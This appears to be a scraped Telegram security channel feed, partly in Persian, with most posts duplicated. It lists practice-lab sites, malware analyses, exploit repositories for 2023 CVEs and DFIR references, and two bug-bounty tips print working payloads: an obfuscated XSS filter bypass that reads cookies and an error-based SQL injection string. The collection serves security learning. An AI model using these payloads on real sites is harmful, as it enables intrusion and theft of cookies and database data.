🔱 FREE LABS FOR RED TEAM/BLUE TEAM - 2023 🔱
· Attack-Defense - https://attackdefense.com
· Alert to win - https://alf.nu/alert1
· Bancocn - https://bancocn.com
· CTF Komodo Security - https://ctf.komodosec.com
· CryptoHack - https://cryptohack.org/
· CMD Challenge - https://cmdchallenge.com
· Explotation Education - https://exploit.education
· Google CTF - https://lnkd.in/e46drbz8
· HackTheBox - https://www.hackthebox.com
· Hackthis - https://www.hackthis.co.uk
· Hacksplaining - https://lnkd.in/eAB5CSTA
· Hacker101 - https://ctf.hacker101.com
· Capture The Flag - Hacker Security - https://lnkd.in/ex7R-C-e
· Hacking-Lab - https://hacking-lab.com/
· HSTRIKE - https://hstrike.com
· ImmersiveLabs - https://immersivelabs.com
· NewbieContest - https://lnkd.in/ewBk6fU5
· OverTheWire - https://overthewire.org
· Practical Pentest Labs - https://lnkd.in/esq9Yuv5
· Pentestlab - https://pentesterlab.com
· Hackaflag BR - https://hackaflag.com.br/
· Penetration Testing Practice Labs - https://lnkd.in/e6wVANYd
· PentestIT LAB - https://lab.pentestit.ru
· PicoCTF - https://picoctf.com
· PWNABLE - https://lnkd.in/eMEwBJzn
· Root-Me - https://www.root-me.org
· Root in Jail - https://rootinjail.com
· SANS Challenger - https://lnkd.in/e5TAMawK
· SmashTheStack - https://lnkd.in/eVn9rP9p
· The Cryptopals Crypto Challenges - https://cryptopals.com
· Try Hack Me - https://tryhackme.com
· Vulnhub - https://www.vulnhub.com
· W3Challs - https://w3challs.com
· WeChall - https://www.wechall.net
· Zenk-Security - https://lnkd.in/ewJ5rNx2
· Cyberdefenders - https://lnkd.in/dVcmjEw8
· LetsDefend- https://letsdefend.io/
@Engineer_Computer
· Attack-Defense - https://attackdefense.com
· Alert to win - https://alf.nu/alert1
· Bancocn - https://bancocn.com
· CTF Komodo Security - https://ctf.komodosec.com
· CryptoHack - https://cryptohack.org/
· CMD Challenge - https://cmdchallenge.com
· Explotation Education - https://exploit.education
· Google CTF - https://lnkd.in/e46drbz8
· HackTheBox - https://www.hackthebox.com
· Hackthis - https://www.hackthis.co.uk
· Hacksplaining - https://lnkd.in/eAB5CSTA
· Hacker101 - https://ctf.hacker101.com
· Capture The Flag - Hacker Security - https://lnkd.in/ex7R-C-e
· Hacking-Lab - https://hacking-lab.com/
· HSTRIKE - https://hstrike.com
· ImmersiveLabs - https://immersivelabs.com
· NewbieContest - https://lnkd.in/ewBk6fU5
· OverTheWire - https://overthewire.org
· Practical Pentest Labs - https://lnkd.in/esq9Yuv5
· Pentestlab - https://pentesterlab.com
· Hackaflag BR - https://hackaflag.com.br/
· Penetration Testing Practice Labs - https://lnkd.in/e6wVANYd
· PentestIT LAB - https://lab.pentestit.ru
· PicoCTF - https://picoctf.com
· PWNABLE - https://lnkd.in/eMEwBJzn
· Root-Me - https://www.root-me.org
· Root in Jail - https://rootinjail.com
· SANS Challenger - https://lnkd.in/e5TAMawK
· SmashTheStack - https://lnkd.in/eVn9rP9p
· The Cryptopals Crypto Challenges - https://cryptopals.com
· Try Hack Me - https://tryhackme.com
· Vulnhub - https://www.vulnhub.com
· W3Challs - https://w3challs.com
· WeChall - https://www.wechall.net
· Zenk-Security - https://lnkd.in/ewJ5rNx2
· Cyberdefenders - https://lnkd.in/dVcmjEw8
· LetsDefend- https://letsdefend.io/
@Engineer_Computer
❤2👍2🔥2🎉1
Malware analysis
1. AndoryuBot
https://www.fortinet.com/blog/threat-research/andoryubot-new-botnet-campaign-targets-ruckus-wireless-admin-remote-code-execution-vulnerability-cve-2023-25717
2. AsyncRAT Loader
https://www.huntress.com/blog/advanced-cyberchef-tips-asyncrat-loader
@Engineer_Computer
1. AndoryuBot
https://www.fortinet.com/blog/threat-research/andoryubot-new-botnet-campaign-targets-ruckus-wireless-admin-remote-code-execution-vulnerability-cve-2023-25717
2. AsyncRAT Loader
https://www.huntress.com/blog/advanced-cyberchef-tips-asyncrat-loader
@Engineer_Computer
Fortinet Blog
AndoryuBot – New Botnet Campaign Targets Ruckus Wireless Admin Remote Code Execution Vulnerability (CVE-2023-25717)
FortiGuard Labs details how a unique botnet leverages a Ruckus vulnerability and examines its behavior once inside an infected device. Learn more.…
exploit
1.CVE-2023-20052:
Information leak vulnerability in the DMG file parser of ClamAV
https://github.com/nokn0wthing/CVE-2023-25002
2. Exploits for CVE-2023-27327, CVE-2023-27328
(Parallels Desktop VM)
https://github.com/kn32/parallels-plist-escape
3. CVE-2023-28231:
DHCP Server RCE (2008 R2 SP1 - Server 2019)
https://github.com/glavstroy/CVE-2023-28231
@Engineer_Computer
1.CVE-2023-20052:
Information leak vulnerability in the DMG file parser of ClamAV
https://github.com/nokn0wthing/CVE-2023-25002
2. Exploits for CVE-2023-27327, CVE-2023-27328
(Parallels Desktop VM)
https://github.com/kn32/parallels-plist-escape
3. CVE-2023-28231:
DHCP Server RCE (2008 R2 SP1 - Server 2019)
https://github.com/glavstroy/CVE-2023-28231
@Engineer_Computer
GitHub
GitHub - nokn0wthing/CVE-2023-20052: CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV
CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV - nokn0wthing/CVE-2023-20052
Demystifying_Soft_Sec_Vulns.pdf
623.9 KB
Research
Sec code review
Bug, Fault, Error, or Weakness: Demystifying Software Security Vulnerabilities", 2023
]-> NIST Vulnerability Data Ontology:
https://github.com/usnistgov/vulntology
@Engineer_Computer
Sec code review
Bug, Fault, Error, or Weakness: Demystifying Software Security Vulnerabilities", 2023
]-> NIST Vulnerability Data Ontology:
https://github.com/usnistgov/vulntology
@Engineer_Computer
Alert! 9 new ransomware families emerge from leaked Babuk source code, capable of targeting Linux and ESXi environments
https://thehackernews.com/2023/05/babuk-source-code-sparks-9-new.html
@Engineer_Computer
https://thehackernews.com/2023/05/babuk-source-code-sparks-9-new.html
@Engineer_Computer
Injecting Payload In Phone Numbers field !
#infosec #bugbountytip #cybersecuritytips
@Engineer_Computer
#infosec #bugbountytip #cybersecuritytips
@Engineer_Computer
XSS WAF Bypass using location concatenation:
Payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
#bugbounty #bugbountytips #xss #xssbypass
@Engineer_Computer
Payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
#bugbounty #bugbountytips #xss #xssbypass
@Engineer_Computer
Some recent lessons learned:
If something is suspicious but SQLMap “thinks” it might/might not be vulnerable, manually confirm/deny before leaving.
Payload example:
' AND extractvalue(rand(),concat(0x3a,(SELECT user()))) #
#bugbountytips #BugBounty
@Engineer_Computer
If something is suspicious but SQLMap “thinks” it might/might not be vulnerable, manually confirm/deny before leaving.
Payload example:
' AND extractvalue(rand(),concat(0x3a,(SELECT user()))) #
#bugbountytips #BugBounty
@Engineer_Computer
⭕️ Building a Red Team Infrastructure in 2023
https://www.securesystems.de/blog/building-a-red-team-infrastructure-in-2023/
#RedTeam
@Engineer_Computer
https://www.securesystems.de/blog/building-a-red-team-infrastructure-in-2023/
#RedTeam
@Engineer_Computer
Systemsecurity
Building a Red Team Infrastructure in 2023
In this blog post an overview of the different components of a red team infrastructure is given. This includes explanations how these work, as well as the comparison of different solutions and their characteristics.
✨Three projects will help you a lot in Malware Analysis✨
✨سه پروژه به شما در تجزیه و تحلیل بدافزار کمک زیادی می کند✨
1️⃣https://filesec.io/#
لیستی از پسوندهای فایل است که می تواند توسط مهاجمان برای phishing, execution, و ماکروها و غیره استفاده شود.
این منبع خوبی برای درک موارد استفاده مخرب از file extentionsرایج و راه هایی است که می توانید در برابر آنها دفاع کنید.
2️⃣ Windows LOLBINS >> https://lolbas-project.github.io/#
کلمه LOLBins اصطلاح اختصاری Living Off the Land Binaries است. این سایت باینری هایی با ماهیت غیر مخرب، که برای سیستم عامل شناخته شده و قانونی هستند را نشان میدهد که توسط مجرمان سایبری برای استتار فعالیت های مخرب خود قابل استفاده و بهره برداری قرار است.
3️⃣ Linux GTFOBINS >> https://gtfobins.github.io/
این GTFOBins پروژهای است که توابع قانونی باینریهای یونیکس را جمعآوری میکند که میتوان از آن برای گرفتن شل، افزایش یا حفظ امتیازات بالا، انتقال فایلها، spawn bind و reverse shellها و تسهیل سایر وظایف پس از بهرهبرداری سوء استفاده کرد.
#blueteam #redteam #soc #forensiceanal #ioc #threatintelligence #threathunting
@Engineer_Computer
✨سه پروژه به شما در تجزیه و تحلیل بدافزار کمک زیادی می کند✨
1️⃣https://filesec.io/#
لیستی از پسوندهای فایل است که می تواند توسط مهاجمان برای phishing, execution, و ماکروها و غیره استفاده شود.
این منبع خوبی برای درک موارد استفاده مخرب از file extentionsرایج و راه هایی است که می توانید در برابر آنها دفاع کنید.
2️⃣ Windows LOLBINS >> https://lolbas-project.github.io/#
کلمه LOLBins اصطلاح اختصاری Living Off the Land Binaries است. این سایت باینری هایی با ماهیت غیر مخرب، که برای سیستم عامل شناخته شده و قانونی هستند را نشان میدهد که توسط مجرمان سایبری برای استتار فعالیت های مخرب خود قابل استفاده و بهره برداری قرار است.
3️⃣ Linux GTFOBINS >> https://gtfobins.github.io/
این GTFOBins پروژهای است که توابع قانونی باینریهای یونیکس را جمعآوری میکند که میتوان از آن برای گرفتن شل، افزایش یا حفظ امتیازات بالا، انتقال فایلها، spawn bind و reverse shellها و تسهیل سایر وظایف پس از بهرهبرداری سوء استفاده کرد.
#blueteam #redteam #soc #forensiceanal #ioc #threatintelligence #threathunting
@Engineer_Computer
🔰 دانستن اینکه چه چیزی در پردازش های ویندوز عادی است، به کاهش نویز در فرآیند جستجوی بدافزار احتمالی کمک میکند.
🔱 https://sansorg.egnyte.com/dl/oQm41D67D6
🔴 از این اطلاعات به عنوان مرجع برای پردازش های عادی ویندوز استفاده کنید و توجه خودتون رو به موارد دیگر معطوف کنید.
@Engineer_Computer
🔱 https://sansorg.egnyte.com/dl/oQm41D67D6
🔴 از این اطلاعات به عنوان مرجع برای پردازش های عادی ویندوز استفاده کنید و توجه خودتون رو به موارد دیگر معطوف کنید.
@Engineer_Computer
SANS-DFIR(iDeFense).pdf
1.9 MB
پوستر بالا رو هم از لینک بالا و هم از اینجا میتونید دانلود کنید.
@Engineer_Computer
@Engineer_Computer
How to bypass Cloudflare, Incapsula, SUCURI and another WAF
https://miloserdov.org/?p=2960
@Engineer_Computer
https://miloserdov.org/?p=2960
@Engineer_Computer
Threat Research
Outlook Patch Analysis Reveals Important Flaw in Windows API
https://www.akamai.com/blog/security-research/important-outlook-vulnerability-bypass-windows-api
@Engineer_Computer
Outlook Patch Analysis Reveals Important Flaw in Windows API
https://www.akamai.com/blog/security-research/important-outlook-vulnerability-bypass-windows-api
@Engineer_Computer
Akamai
From One Vulnerability to Another: Outlook Patch Analysis Reveals Important Flaw in Windows API | Akamai
Akamai researchers explore a new critical vulnerability in Windows that could lead to a bypass of CVE-2023-23397’s mitigation.